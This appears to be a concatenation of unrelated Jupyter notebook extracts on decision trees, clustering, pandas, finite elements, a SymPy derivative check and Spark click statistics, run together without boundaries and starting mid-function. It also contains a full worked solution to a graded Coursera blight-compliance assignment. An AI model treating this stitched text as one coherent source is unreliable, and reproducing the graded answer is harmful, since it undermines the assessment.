cax=cax, ticks=c_ticks); plt.sca(cur_ax);Define function to visualize hard decisions made as thresholdYou don't need to understand this in detail. 
Just a utility function.def plot_pretty_decision_boundaries_for_clf( clf, threshold=0.5, do_show_colorbar=False, x1_ticks=np.asarray([0, 2, 4]), x2_ticks=np.asarray([0, 2, 4]), c_levels=np.linspace(0, 1, 100), c_ticks=np.asarray([0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]), x1_grid=np.linspace(-1, 2.3, 100), x2_grid=np.linspace(-1, 2.3, 100)): cur_ax = plt.gca() G = x1_grid.size H = x2_grid.size # Get regular grid of G x H points, where each point is an (x1, x2) location x1_GH, x2_GH = np.meshgrid(x1_grid, x2_grid) # Combine the x1 and x2 values into one array # Flattened into M = G x H rows # Each row of x_M2 is a 2D vector [x_m1, x_m2] x_M2 = np.hstack([x1_GH.flatten()[:,np.newaxis], x2_GH.flatten()[:,np.newaxis]]) # Predict proba for each point in the flattened grid yproba1_M = clf.predict_proba(x_M2)[:,1] yhat_M = yproba1_M >= threshold # Reshape the M probas into the GxH 2D field yhat_GH = np.reshape(yhat_M, x1_GH.shape) cmap = plt.cm.RdYlBu my_contourf_h = plt.contourf(x1_GH, x2_GH, yhat_GH, levels=c_levels, vmin=0, vmax=1.0, cmap=cmap) plt.xticks(x1_ticks, x1_ticks); plt.yticks(x2_ticks, x2_ticks); if do_show_colorbar: left, bottom, width, height = plt.gca().get_position().bounds cax = plt.gcf().add_axes([left+1.1*width, bottom, 0.03, height]) plt.colorbar(my_contourf_h, orientation='vertical', cax=cax, ticks=c_ticks); plt.sca(cur_ax);Part 3: Visualization of DecisionTree predictions as we vary max_depthGenerally, max_depth is one of the key hyperparameters that controls model complexity. Figure: DecisionTree predicted proba (colors) over 2D plane of x1, x2max_depth_grid = [1, 2, 4, 8, 16] trees_by_depth = dict() ncols = len(max_depth_grid) fig_h, axes = plt.subplots(nrows=1, ncols=ncols, figsize=(5 * ncols, 5)) is_last = False for ii, max_depth in enumerate(max_depth_grid): if ii == ncols - 1: is_last = True plt.sca(axes[ii]) clf = sklearn.tree.DecisionTreeClassifier(max_depth=max_depth) clf.fit(x_N2, y_N) auroc = sklearn.metrics.roc_auc_score(y_N, clf.predict_proba(x_N2)[:,1]) plot_pretty_probabilities_for_clf(clf, do_show_colorbar=is_last); plot_pretty_data_colored_by_labels(x_N2, y_N); plt.title("max_depth=%d\ntrain_AUROC %.3f" % (max_depth, auroc)) # Store for later trees_by_depth[max_depth] = clfFigure: DecisionTree hard binary decisions (colors) over 2D plane of (x1, x2)Using Threshold: 0.5max_depth_grid = [1, 2, 4, 8, 16] ncols = len(max_depth_grid) fig_h, axes = plt.subplots(nrows=1, ncols=ncols, figsize=(5 * ncols, 5)) is_last = False for ii, max_depth in enumerate(max_depth_grid): if ii == ncols - 1: is_last = True plt.sca(axes[ii]) clf = sklearn.tree.DecisionTreeClassifier(max_depth=max_depth) clf.fit(x_N2, y_N) err_rate = np.mean(np.logical_xor(y_N, clf.predict(x_N2))) plot_pretty_decision_boundaries_for_clf(clf, do_show_colorbar=is_last); plot_pretty_data_colored_by_labels(x_N2, y_N); plt.title("max_depth=%d\ntrain_error_rate %.3f" % (max_depth, err_rate))Discussion 3a: At what depth does the classifier reach zero error on the training set? Would we expect the same on the validation set? Discussion 3b: How could you select the maximum depth hyperparameter on a new dataset?* What search strategies would you consider?* What minimum and maximum candidate values would you consider? Part 4 (Bonus) Inspect the learned tree structure on the F=2 problem above Remember, above we stored the learned trees inside our trees_by_depth dict. We'll now inspect each one to get a sense of how these models vary from simple to complex. 
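As a cross-check on `pretty_print_tree`, you could also print each stored tree with scikit-learn's built-in text exporter. The minimal sketch below assumes scikit-learn >= 0.21 (where `sklearn.tree.export_text` was added) and that the `trees_by_depth` dict from Part 3 is still in memory; the feature names 'x1' and 'x2' are just labels chosen for readability.
from sklearn.tree import export_text

for depth in sorted(trees_by_depth.keys()):
    print("=== max_depth=%d ===" % depth)
    # Print the split rules and leaf class counts of the stored tree
    print(export_text(trees_by_depth[depth], feature_names=['x1', 'x2']))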
DEPTH 1pretty_print_tree(trees_by_depth[1])DEPTH 2pretty_print_tree(trees_by_depth[2])DEPTH 4pretty_print_tree(trees_by_depth[4])HIERARCHICAL CLUSTERING**File:** hierarchical.ipynb**Course:** Data Science Foundations: Data Mining in Python IMPORT LIBRARIESimport pandas as pd # For dataframes import matplotlib.pyplot as plt # For plotting data import seaborn as sns # For plotting data from sklearn.cluster import AgglomerativeClustering # For clustering from scipy.cluster.hierarchy import dendrogram, linkage # For clustering and visualizationLOAD AND PREPARE DATARead the `penguins.csv` file from the `data` directory into variable `df`. Select a random sample of 75 cases from the dataset for easier visualization. Keep all features in variable `df` and store the class variable in `y`.# Reads the .csv file into variable df df = pd.read_csv('data/penguins.csv') # Selects a random sample of 75 cases df = df.sample(n=75, random_state=1) # Stores the class variable in y y = df.y # Removes the y column from df df = df.drop('y', axis=1) # Displays the first 5 rows of df df.head()HIERARCHICAL CLUSTERING In this demonstration, we'll use `SciPy` to perform hierarchical clustering. (Another common choice is `scikit-learn`.)The `scipy.cluster.hierarchy` package provides two functions for hierarchical clustering: `linkage()` and `dendrogram()`. The `linkage()` function performs agglomerative clustering and the `dendrogram()` function displays the clusters. Various `linkage` methods are possible. Here we'll use the `ward` linkage method, which at each step merges the pair of clusters that gives the smallest increase in within-cluster variance. Other linkage options are:- `average`- `single` - `complete` The `linkage()` function returns a linkage matrix with information about the clusters. This matrix can be visualized using the `dendrogram()` function. The code below performs clustering using the `euclidean` metric and displays the clusters.# Performs agglomerative clustering using `ward` linkage and `euclidean` metric hc = linkage(df, method='ward', metric='euclidean') # Sets the figure size fig = plt.figure(figsize=(15, 15)) # Displays the dendrogram # The lambda function sets the labels of each leaf dn = dendrogram( hc, leaf_label_func=lambda id: y.values[id], leaf_font_size=10)PandasOfficial website: [https://pandas.pydata.org/pandas-docs/stable/index.html](https://pandas.pydata.org/pandas-docs/stable/index.html)""" Import libraries and load CSV files into pandas DataFrames. Read in a tiny portion of the table """ import pandas as pd # df = pd.DataFrame.from_csv("../datasets/top_50_spotify.csv") # df = pd.read_csv("../datasets/top_50_spotify.csv", encoding="ISO-8859-1", nrows=10, usecols=["Energy", "Genre", "Track.Name", "Artist.Name"]) df = pd.read_csv("../datasets/top_50_spotify.csv", encoding="ISO-8859-1", nrows=10) df1.1 Attributes""" Return a tuple representing the dimensionality of the DataFrame. """ df.shape """ Return an int representing the number of elements in this object. """ df.size """ The column labels of the DataFrame. """ df.columns """ Return the dtypes in the DataFrame. """ df.dtypes """ Return an int representing the number of axes / array dimensions. """ df.ndim1.2 Indexing and iteration""" Return the first n rows. Default is 5 """ df.head() # df.head(2) """ Return the last n rows. Default is 5 """ df.tail() # df.tail(2) """ Access a group of rows and columns by label(s) or a boolean array. 
""" df.loc[:] # df.loc[:2] # df.loc[2:5] # df.loc[47:] # df.loc[:2, ["Energy", "Artist.Name"]] # df.loc[data["Energy"] < 40] # df.loc[data["Energy"] < 40, ["Energy", "Artist.Name"]] """ Purely integer-location based indexing for selection by position. """ df.iloc[:] # df.iloc[:2] # df.iloc[2:5] # df.iloc[47:] # IndexError: .iloc requires numeric indexers, got ['Energy' 'Artist.Name'] ## df.iloc[:2, ["Energy", "Artist.Name"]] # df.iloc[:2, 2:6] """ Iterator over (column name, Series) pairs. """ for label, content in df.items(): print('Label:', label) print('Content: ', content, sep='\n')Label: Unnamed: 0 Content: 0 1 1 2 2 3 3 4 4 5 5 6 6 7 7 8 8 9 9 10 Name: Unnamed: 0, dtype: int64 Label: Track.Name Content: 0 Señorita 1 China 2 boyfriend (with Social House) 3 Beautiful People (feat. Khalid) 4 Goodbyes (Feat. Young Thug) 5 I Don't Care (with ) 6 Ransom 7 How Do You Sleep? 8 Old Town Road - Remix 9 bad guy Name: Track.Name, dtype: object Label: Artist.Name Content: 0 1 2 3 4 Post Malone 5 6 7 8 9 Name: Artist.Name, dtype: object Label: Genre Content: 0 canadian pop 1 reggaeton flow 2 dance pop 3 pop 4 dfw rap 5 pop 6 trap mu[...]1.3 Descriptive stats""" Generate descriptive statistics that summarize the central tendency, dispersion and shape of a dataset’s distribution, excluding NaN values. """ df.describe() """ Compute pairwise correlation of columns, excluding NA/null values. """ df.corr() """ Return the mean of the values for the requested axis. """ df.mean() """ Return the median of the values for the requested axis. """ df.median() """ Count non-NA cells for each column or row. """ df.count()1.4 Serialization""" Print a concise summary of a DataFrame. """ df.info() RangeIndex: 10 entries, 0 to 9 Data columns (total 14 columns): Unnamed: 0 10 non-null int64 Track.Name 10 non-null object Artist.Name 10 non-null object Genre 10 non-null object Beats.Per.Minute 10 non-null int64 Energy 10 non-null int64 Danceability 10 non-null int64 Loudness..dB.. 10 non-null int64 Liveness 10 non-null int64 Valence. 10 non-null int64 Length. 10 non-null int64 Acousticness.. 10 non-null int64 Speechiness. 10 non-null int64 Popularity 10 non-null int64 dtypes: int64(11), object(3) memory usage: 1.2+ KBExample 12The use case from the user manual. The example does not contain anything that is not covered in the previous examples.import calfem.core as cfc import calfem.vis_mpl as cfv import calfem.utils as cfu import calfem.shapes as cfs import calfem.solver as cfslv import numpy as np %matplotlib notebookGeneral problem variablesrect = cfs.Rectangle(5.0, 1.0, element_type=2, dofs_per_node=1, max_area=0.08) rect.t = 1 rect.ep = [rect.t, 1] rect.D = np.diag([1.7, 1.7])Create meshmesh = cfs.ShapeMesh(rect)Solve problemsolver = cfslv.Flow2DSolver(mesh) solver.addBC(rect.left_id, 0.0) solver.addBC(rect.right_id, 120.0) #solver.addForceTotal(rect.topId, -10e5, dimension=2) results = solver.execute()Visualise results Geometrycfv.figure() cfv.draw_geometry(rect.geometry(), title="Geometry")Meshcfv.figure() cfv.draw_mesh(mesh.coords, mesh.edof, rect.dofs_per_node, rect.element_type, filled=True, title="Mesh") #Draws the mesh.Nodal valuescfv.figure() cfv.draw_nodal_values_shaded(results.a, mesh.coords, mesh.edof) plt.colorbar()---_You are currently looking at **version 1.1** of this notebook. 
To download notebooks and datafiles, as well as get help on Jupyter notebooks in the Coursera platform, visit the [Jupyter Notebook FAQ](https://www.coursera.org/learn/python-machine-learning/resources/bANLa) course resource._--- Assignment 4 - Understanding and Predicting Property Maintenance FinesThis assignment is based on a data challenge from the Michigan Data Science Team ([MDST](http://midas.umich.edu/mdst/)). The Michigan Data Science Team ([MDST](http://midas.umich.edu/mdst/)) and the Michigan Student Symposium for Interdisciplinary Statistical Sciences ([MSSISS](https://sites.lsa.umich.edu/mssiss/)) have partnered with the City of Detroit to help solve one of the most pressing problems facing Detroit - blight. [Blight violations](http://www.detroitmi.gov/How-Do-I/Report/Blight-Complaint-FAQs) are issued by the city to individuals who allow their properties to remain in a deteriorated condition. Every year, the city of Detroit issues millions of dollars in fines to residents and every year, many of these fines remain unpaid. Enforcing unpaid blight fines is a costly and tedious process, so the city wants to know: how can we increase blight ticket compliance?The first step in answering this question is understanding when and why a resident might fail to comply with a blight ticket. This is where predictive modeling comes in. For this assignment, your task is to predict whether a given blight ticket will be paid on time.All data for this assignment has been provided to us through the [Detroit Open Data Portal](https://data.detroitmi.gov/). **Only the data already included in your Coursera directory can be used for training the model for this assignment.** Nonetheless, we encourage you to look into data from other Detroit datasets to help inform feature creation and model selection. We recommend taking a look at the following related datasets:* [Building Permits](https://data.detroitmi.gov/Property-Parcels/Building-Permits/xw2a-a7tf)* [Trades Permits](https://data.detroitmi.gov/Property-Parcels/Trades-Permits/635b-dsgv)* [Improve Detroit: Submitted Issues](https://data.detroitmi.gov/Government/Improve-Detroit-Submitted-Issues/fwz3-w3yn)* [DPD: Citizen Complaints](https://data.detroitmi.gov/Public-Safety/DPD-Citizen-Complaints-2016/kahe-efs3)* [Parcel Map](https://data.detroitmi.gov/Property-Parcels/Parcel-Map/fxkw-udwf)___We provide you with two data files for use in training and validating your models: train.csv and test.csv. Each row in these two files corresponds to a single blight ticket, and includes information about when, why, and to whom each ticket was issued. The target variable is compliance, which is True if the ticket was paid early, on time, or within one month of the hearing data, False if the ticket was paid after the hearing date or not at all, and Null if the violator was found not responsible. Compliance, as well as a handful of other variables that will not be available at test-time, are only included in train.csv.Note: All tickets where the violators were found not responsible are not considered during evaluation. They are included in the training set as an additional source of data for visualization, and to enable unsupervised and semi-supervised approaches. However, they are not included in the test set.**File descriptions** (Use only this data for training your model!) 
train.csv - the training set (all tickets issued 2004-2011) test.csv - the test set (all tickets issued 2012-2016) addresses.csv & latlons.csv - mapping from ticket id to addresses, and from addresses to lat/lon coordinates. Note: misspelled addresses may be incorrectly geolocated.**Data fields**train.csv & test.csv ticket_id - unique identifier for tickets agency_name - Agency that issued the ticket inspector_name - Name of inspector that issued the ticket violator_name - Name of the person/organization that the ticket was issued to violation_street_number, violation_street_name, violation_zip_code - Address where the violation occurred mailing_address_str_number, mailing_address_str_name, city, state, zip_code, non_us_str_code, country - Mailing address of the violator ticket_issued_date - Date and time the ticket was issued hearing_date - Date and time the violator's hearing was scheduled violation_code, violation_description - Type of violation disposition - Judgment and judgement type fine_amount - Violation fine amount, excluding fees admin_fee - $20 fee assigned to responsible judgmentsstate_fee - $10 fee assigned to responsible judgments late_fee - 10% fee assigned to responsible judgments discount_amount - discount applied, if any clean_up_cost - DPW clean-up or graffiti removal cost judgment_amount - Sum of all fines and fees grafitti_status - Flag for graffiti violations train.csv only payment_amount - Amount paid, if any payment_date - Date payment was made, if it was received payment_status - Current payment status as of Feb 1 2017 balance_due - Fines and fees still owed collection_status - Flag for payments in collections compliance [target variable for prediction] Null = Not responsible 0 = Responsible, non-compliant 1 = Responsible, compliant compliance_detail - More information on why each ticket was marked compliant or non-compliant___ EvaluationYour predictions will be given as the probability that the corresponding blight ticket will be paid on time.The evaluation metric for this assignment is the Area Under the ROC Curve (AUC). Your grade will be based on the AUC score computed for your classifier. A model which with an AUROC of 0.7 passes this assignment, over 0.75 will recieve full points.___For this assignment, create a function that trains a model to predict blight ticket compliance in Detroit using `train.csv`. Using this model, return a series of length 61001 with the data being the probability that each corresponding ticket from `test.csv` will be paid, and the index being the ticket_id.Example: ticket_id 284932 0.531842 285362 0.401958 285361 0.105928 285338 0.018572 ... 376499 0.208567 376500 0.818759 369851 0.018528 Name: compliance, dtype: float32 Hints* Make sure your code is working before submitting it to the autograder.* Print out your result to see whether there is anything weird (e.g., all probabilities are the same).* Generally the total runtime should be less than 10 mins. You should NOT use Neural Network related classifiers (e.g., MLPClassifier) in this question. * Try to avoid global variables. 
If you have other functions besides blight_model, you should move those functions inside the scope of blight_model.* Refer to the pinned threads in Week 4's discussion forum when there is something you could not figure it out.import pandas as pd import numpy as np def blight_model(): # Your code here X_train = pd.read_csv('train.csv', encoding='ISO-8859-1') X_test = pd.read_csv('test.csv', encoding='ISO-8859-1') X_train = X_train[pd.notnull(X_train['compliance'])] y_train = X_train['compliance'] X_train = X_train.drop(['payment_amount', 'payment_date', 'payment_status', 'balance_due', 'collection_status', 'compliance', 'compliance_detail'], axis=1) address = pd.read_csv('addresses.csv') loc = pd.read_csv('latlons.csv') X_train = X_train.merge(address.merge(loc, how='inner', on='address'), how='inner', on='ticket_id') X_test = X_test.merge(address.merge(loc, how='inner', on='address'), how='inner', on='ticket_id') X_train.set_index('ticket_id', inplace=True) X_test.set_index('ticket_id', inplace=True) X_train = X_train.drop(['inspector_name', 'violator_name', 'violation_street_number', 'violation_street_name', 'violation_zip_code', 'mailing_address_str_number', 'mailing_address_str_number', 'mailing_address_str_name', 'zip_code', 'non_us_str_code', 'country', 'violation_code', 'city', 'violation_description', 'fine_amount', 'admin_fee', 'state_fee', 'late_fee', 'discount_amount', 'clean_up_cost', 'address', 'grafitti_status'], axis=1) y_train.reset_index(drop=True, inplace=True) X_test = X_test.drop(['inspector_name', 'violator_name', 'violation_street_number', 'violation_street_name', 'violation_zip_code', 'mailing_address_str_number', 'mailing_address_str_number', 'mailing_address_str_name', 'zip_code', 'non_us_str_code', 'country', 'violation_code', 'city', 'violation_description', 'fine_amount', 'admin_fee', 'state_fee', 'late_fee', 'discount_amount', 'clean_up_cost', 'address', 'grafitti_status'], axis=1) X_train['state'].fillna(method='pad', inplace=True) X_train['lat'].fillna(method='pad', inplace=True) X_train['lon'].fillna(method='pad', inplace=True) X_test['state'].fillna(method='pad', inplace=True) X_test['lat'].fillna(method='pad', inplace=True) X_test['lon'].fillna(method='pad', inplace=True) X = pd.concat([X_train, X_test]) X = pd.get_dummies(X, columns=['agency_name', 'state', 'disposition']) X_train = X[:len(X_train)] X_test = X[len(X_train):] from datetime import timedelta, datetime null_idx = X_train['hearing_date'].isnull() filld_idx = X_train['hearing_date'].notnull() X_train['hearing_date'] = pd.to_datetime(X_train["hearing_date"], format="%Y-%m-%d %H:%M:%S") X_train['ticket_issued_date'] = pd.to_datetime(X_train["ticket_issued_date"], format="%Y-%m-%d %H:%M:%S") avg_time_diff = (X_train[filld_idx]['hearing_date'] - X_train[filld_idx]['ticket_issued_date']).mean().days X_train['Time diff'] = [(date_h - date_i).days if pd.notnull(date_h) else avg_time_diff \ for (date_h, date_i) in zip(X_train['hearing_date'], X_train['ticket_issued_date']) ] X_train.drop(['hearing_date', 'ticket_issued_date'], axis=1, inplace=True) null_idx = X_test['hearing_date'].isnull() filld_idx = X_test['hearing_date'].notnull() X_test['hearing_date'] = pd.to_datetime(X_test["hearing_date"], format="%Y-%m-%d %H:%M:%S") X_test['ticket_issued_date'] = pd.to_datetime(X_test["ticket_issued_date"], format="%Y-%m-%d %H:%M:%S") X_test['Time diff'] = [(date_h - date_i).days if pd.notnull(date_h) else avg_time_diff \ for (date_h, date_i) in zip(X_test['hearing_date'], X_test['ticket_issued_date']) ] 
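    # Note: test rows with a missing hearing_date reuse avg_time_diff, which was computed on the
    # training set above, so the engineered 'Time diff' feature (gap in days between ticket issue
    # and hearing) is defined for every row. The raw date columns are dropped next.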
X_test.drop(['hearing_date', 'ticket_issued_date'], axis=1, inplace=True) from sklearn.preprocessing import MinMaxScaler from sklearn.linear_model import LogisticRegression from sklearn.model_selection import GridSearchCV from sklearn.metrics import roc_auc_score, confusion_matrix clf = LogisticRegression() grid_values = {'C' : [0.001, 0.01, 0.1, 1, 10, 100, 1000]} grid_clf_roc = GridSearchCV(clf, param_grid=grid_values) grid_clf_roc.fit(X_train, y_train) prob = grid_clf_roc.predict_proba(X_test) prob = [x[1] for x in prob] result = pd.Series(prob, index=X_test.index) return result blight_model() X_Tr = pd.read_csv('train.csv', encoding='ISO-8859-1') X_Tr = X_Tr[pd.notnull(X_Tr['compliance'])] Y_Tr = X_Tr['compliance'] X_Tr = X_Tr.drop(['payment_amount', 'payment_date', 'payment_status', 'balance_due', 'collection_status', 'compliance', 'compliance_detail'], axis=1) address = pd.read_csv('addresses.csv') loc = pd.read_csv('latlons.csv') X_Tr = X_Tr.merge(address.merge(loc, how='inner', on='address'), how='inner', on='ticket_id') X_Tr = X_Tr.drop(['ticket_id', 'inspector_name', 'violator_name', 'violation_street_number', 'violation_street_name', 'violation_zip_code', 'mailing_address_str_number', 'mailing_address_str_number', 'mailing_address_str_name', 'zip_code', 'non_us_str_code', 'country', 'violation_code', 'city', 'violation_description', 'fine_amount', 'admin_fee', 'state_fee', 'late_fee', 'discount_amount', 'clean_up_cost', 'address', 'grafitti_status'], axis=1) Y_Tr.reset_index(drop=True, inplace=True) X_Tr.columns X_Tr['state'].fillna(method='pad', inplace=True) X_Tr['lat'].fillna(method='pad', inplace=True) X_Tr['lon'].fillna(method='pad', inplace=True) from sklearn.model_selection import train_test_split x_tr, x_ts, y_tr, y_ts = train_test_split(X_Tr, Y_Tr, random_state=1) X = pd.concat([x_tr, x_ts]) X = pd.get_dummies(X, columns=['agency_name', 'state', 'disposition']) x_tr = X[:len(x_tr)] x_ts = X[len(x_tr):] from datetime import timedelta, datetime null_idx = x_tr['hearing_date'].isnull() filld_idx = x_tr['hearing_date'].notnull() x_tr['hearing_date'] = pd.to_datetime(x_tr["hearing_date"], format="%Y-%m-%d %H:%M:%S") x_tr['ticket_issued_date'] = pd.to_datetime(x_tr["ticket_issued_date"], format="%Y-%m-%d %H:%M:%S") avg_time_diff = (x_tr[filld_idx]['hearing_date'] - x_tr[filld_idx]['ticket_issued_date']).mean().days x_tr['Time diff'] = [(date_h - date_i).days if pd.notnull(date_h) else avg_time_diff \ for (date_h, date_i) in zip(x_tr['hearing_date'], x_tr['ticket_issued_date']) ] x_tr.drop(['hearing_date', 'ticket_issued_date'], axis=1, inplace=True) null_idx = x_ts['hearing_date'].isnull() filld_idx = x_ts['hearing_date'].notnull() x_ts['hearing_date'] = pd.to_datetime(x_ts["hearing_date"], format="%Y-%m-%d %H:%M:%S") x_ts['ticket_issued_date'] = pd.to_datetime(x_ts["ticket_issued_date"], format="%Y-%m-%d %H:%M:%S") x_ts['Time diff'] = [(date_h - date_i).days if pd.notnull(date_h) else avg_time_diff \ for (date_h, date_i) in zip(x_ts['hearing_date'], x_ts['ticket_issued_date']) ] x_ts.drop(['hearing_date', 'ticket_issued_date'], axis=1, inplace=True) from sklearn.linear_model import LogisticRegression from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import RandomForestClassifier from sklearn.ensemble import GradientBoostingClassifier from sklearn.svm import SVC from sklearn.model_selection import GridSearchCV from sklearn.metrics import roc_auc_score, confusion_matrix clf = LogisticRegression() clf.fit(x_tr, y_tr) roc_auc_score(y_tr, 
clf.decision_function(x_tr)) from sklearn.preprocessing import MinMaxScaler minmax = MinMaxScaler() x_tr = minmax.fit_transform(x_tr) x_ts = minmax.transform(x_ts) clf.fit(x_tr, y_tr) roc_auc_score(y_ts, clf.decision_function(x_ts)) roc_auc_score(y_tr, clf.decision_function(x_tr)) # roc_tr = [] # roc_ts = [] # parameter = [] # for param in [0.001, 0.01, 0.1, 1, 10, 100, 1000]: # print(param) # clf = LogisticRegression(C=param) # clf.fit(x_tr, y_tr) # roc_tr.append(roc_auc_score(y_tr, clf.decision_function(x_tr))) # roc_ts.append(roc_auc_score(y_ts, clf.decision_function(x_ts))) # parameter.append(param) # import matplotlib.pyplot as plt # plt.plot(parameter, roc_tr) # plt.plot(parameter, roc_ts) # plt.show()The $\eta$ functionimport numpy as np import matplotlib.pyplot as pl %matplotlib notebook from IPython.display import display, Math import sympy from sympy import * # Initialize the session init_session(quiet=True) # Let's report what version of sympy this is print("Using sympy version", sympy.__version__) eta, r, b, k0, k1, A, k2 = symbols("\eta r b kappa_0 kappa_1 A, k^2") k2 = (1 - r ** 2 - b ** 2 + 2 * b * r) / (4 * b * r) A = Rational(1, 2) * sqrt((1 + (r + b)) * (b - (1 - r)) * (b + (1 - r)) * (1 + (r - b))) k0 = atan2(2 * A, (r - 1) * (r + 1) + b ** 2) k1 = atan2(2 * A, (1 - r) * (1 + r) + b ** 2)The $\eta$ function in the paper is identical to $\eta_1$ (for $k^2 \le 1$) and $\eta_2$ (for $k^2 > 1$) in Equation (7) of Mandel & Agol (2002). Below we compute its derivatives with respect to $b$ and $r$. $k^2 \le$ 1eta = 1 / (2 * pi) * (k1 + r ** 2 * (r ** 2 + 2 * b ** 2) * k0 - Rational(1, 2) * (1 + 5 * r ** 2 + b ** 2) * A)This is the derivative according to the paper:detadr_paper = (2 * r / pi) * ((r ** 2 + b ** 2) * k0 - 2 * A)Is it correct?simplify(diff(eta, r) - detadr_paper) == 0**QED** This is the derivative according to the paper:detadb_paper = (1 / (2 * pi * b)) * (4 * r ** 2 * b ** 2 * k0 - 2 * (1 + b ** 2 + r ** 2) * A)Is it correct?simplify(diff(eta, b) - detadb_paper) == 0**QED** $k^2$ > 1eta = r ** 2 / 2 * (r ** 2 + 2 * b ** 2) simplify(diff(eta, r))**QED**simplify(diff(eta, b))Connect to Google Drive%%capture import google.colab.drive google.colab.drive.mount('/content/gdrive', force_remount=True)Install Spark and dependenciesimport os os.environ['HADOOP_VERSION'] = '2.7' os.environ['JAVA_HOME'] = '/usr/lib/jvm/java-8-openjdk-amd64' os.environ['SPARK_HOME'] = '/opt/spark' os.environ['SPARK_VERSION'] = '2.4.3' %%capture !wget -qN https://archive.apache.org/dist/spark/spark-$SPARK_VERSION/spark-$SPARK_VERSION-bin-hadoop$HADOOP_VERSION.tgz !tar -xzf spark-$SPARK_VERSION-bin-hadoop$HADOOP_VERSION.tgz -C /opt !rm spark-$SPARK_VERSION-bin-hadoop$HADOOP_VERSION.tgz !rm -rf /opt/spark !ln -s /opt/spark-$SPARK_VERSION-bin-hadoop$HADOOP_VERSION /opt/spark !pip install -q findsparkCreate SparkSessionimport findspark findspark.init() from pyspark.sql import SparkSession spark = SparkSession.builder.master('local[*]').getOrCreate()Read filesimport json import pyspark.sql.functions as F import pyspark.sql.types as T DATA_PATH = '/content/gdrive/My Drive/dataset/adressa/one_week' with open(os.path.join(DATA_PATH, 'schema', 'clean.json')) as file: clean_schema = T.StructType.fromJson(json.load(file)) df_clean = spark.read.json(os.path.join(DATA_PATH, 'clean'), schema=clean_schema) df_clean.cache()Do some basic statisticsdf_clean.show(truncate=False)+-------------------------------------------+----------+----------------------------------------+-----------+-----------------------+ 
|userId |time |newsId |publishtime|categoryList | +-------------------------------------------+----------+----------------------------------------+-----------+-----------------------+ |cx:10aahg3cyumaa128zgcrqm02zi:2gi7mzuwpxq8j|1483386860|cf83d342459ce871e2a8562a91b7dca946e3201a|1483369567 |[nyheter, moreromsdal] | |cx:10aahg3cyumaa128zgcrqm02zi:2gi7mzuwpxq8j|1483802430|01d923a1af0487ccbf9804bea12f49c12727214a|1483797105 |[100sport, fotball] | |cx:10aahg3cyumaa128zgcrqm02zi:2gi7mzuwpxq8j|1483802488|7e98f8a1a50a409a25831be225e01e261dfe04fc|1483790765 |[100sport, vintersport]| |cx:10aahg3cyumaa128zgcrqm02zi:2gi7mzuwpxq8j|1483826863|7e98f8a1a50a409a25831be225e01e261dfe04fc|1483790765 |[100sport, vintersport]| |cx:10bpet3dluncp1iz2clzlonsd:27z0v4p30cx3n |1483266354|05e420[...]Number of eventsn_events = df_clean.count() n_eventsNumber of usersn_users = df_clean.select(F.column('userId')).distinct().count() n_usersNumber of itemsn_items = df_clean.select(F.column('newsId')).distinct().count() n_itemsSparsityn_events / (n_users * n_items)Disk usage!du -sh /content/gdrive/My\ Drive/dataset/adressa/one_week/clean218M /content/gdrive/My Drive/dataset/adressa/one_week/cleanTrain and testtrain_test_split_time = 1483743600 # 2017/01/06 23:00:00 UTCTrain sizetrain_size = df_clean.filter(F.column('time') < train_test_split_time).count() train_sizeTest sizetest_size = df_clean.filter(F.column('time') >= train_test_split_time).count() test_sizeTrain / test ratiotrain_size / test_sizeNumber of clicks Per user( df_clean .groupBy('userId') .count() .agg( F.min('count'), F.max('count'), F.avg('count'), ) ).show(truncate=False)+----------+----------+------------------+ |min(count)|max(count)|avg(count) | +----------+----------+------------------+ |1 |223 |4.8619605386286855| +----------+----------+------------------+Per item( df_clean .groupBy('newsId') .count() .agg( F.min('count'), F.max('count'), F.avg('count'), ) ).show(truncate=False)+----------+----------+-----------------+ |min(count)|max(count)|avg(count) | +----------+----------+-----------------+ |1 |43106 |1185.848162475822| +----------+----------+-----------------+Per day( df_clean .select(F.dayofyear(F.from_unixtime(F.column('time') + 3600)).alias('day')) .filter( (F.column('day') > 0) & (F.column('day') < 8) ) .groupBy('day') .count() .agg( F.min('count'), F.max('count'), F.avg('count'), ) ).show(truncate=False)+----------+----------+------------------+ |min(count)|max(count)|avg(count) | +----------+----------+------------------+ |59856 |233916 |175166.14285714287| +----------+----------+------------------+Number of items published per day( df_clean .dropDuplicates(subset=['newsId']) .select(F.dayofyear(F.from_unixtime(F.column('publishtime') + 3600)).alias('day')) .filter( (F.column('day') > 0) & (F.column('day') < 8) ) .groupBy('day') .count() .agg( F.min('count'), F.max('count'), F.avg('count'), ) ).show(truncate=False)+----------+----------+----------+ |min(count)|max(count)|avg(count)| +----------+----------+----------+ |37 |69 |55.0 | +----------+----------+----------+Time between clicksfrom pyspark.sql import WindowPer user( df_clean .withColumn( 'timeLastClick', F.sum('time').over( Window .partitionBy('userId') .orderBy('time') .rowsBetween(-1, -1) ) ) .filter(F.column('timeLastClick').isNotNull()) .withColumn( 'timeFromLastClick', (F.column('time') - F.column('timeLastClick')), ) .agg( F.min('timeFromLastClick'), F.max('timeFromLastClick'), F.avg('timeFromLastClick'), ) 
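    # The one-row window frame rowsBetween(-1, -1) makes F.sum('time') return the previous
    # click's timestamp within each userId partition (effectively a lag), so timeFromLastClick
    # below is the gap in seconds between consecutive clicks by the same user.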
).show(truncate=False)+----------------------+----------------------+----------------------+ |min(timeFromLastClick)|max(timeFromLastClick)|avg(timeFromLastClick)| +----------------------+----------------------+----------------------+ |1 |603198 |39673.53356516775 | +----------------------+----------------------+----------------------+Per item( df_clean .withColumn( 'timeLastClick', F.sum('time').over( Window .partitionBy('newsId') .orderBy('time') .rowsBetween(-1, -1) ) ) .filter(F.column('timeLastClick').isNotNull()) .withColumn( 'timeFromLastClick', (F.column('time') - F.column('timeLastClick')), ) .agg( F.min('timeFromLastClick'), F.max('timeFromLastClick'), F.avg('timeFromLastClick'), ) ).show(truncate=False)+----------------------+----------------------+----------------------+ |min(timeFromLastClick)|max(timeFromLastClick)|avg(timeFromLastClick)| +----------------------+----------------------+----------------------+ |0 |594142 |137.89515424039675 | +----------------------+----------------------+----------------------+Materialien zu zufallAutor: - Aufgaben 4 - Mehrere Listen Siehe dazuElemente der MathematikLeistungskurs StochastikSchroedel 2003S. 87 Aufgabe 9a%run zufall/start1. Augensumme beim gemeinsamen Werfen von Tetraeder und OktaederEs wird die Zufallsgröße $X$ = "Augensumme beim gemeinsamen Werfen eines regu-lären Tetraeders und 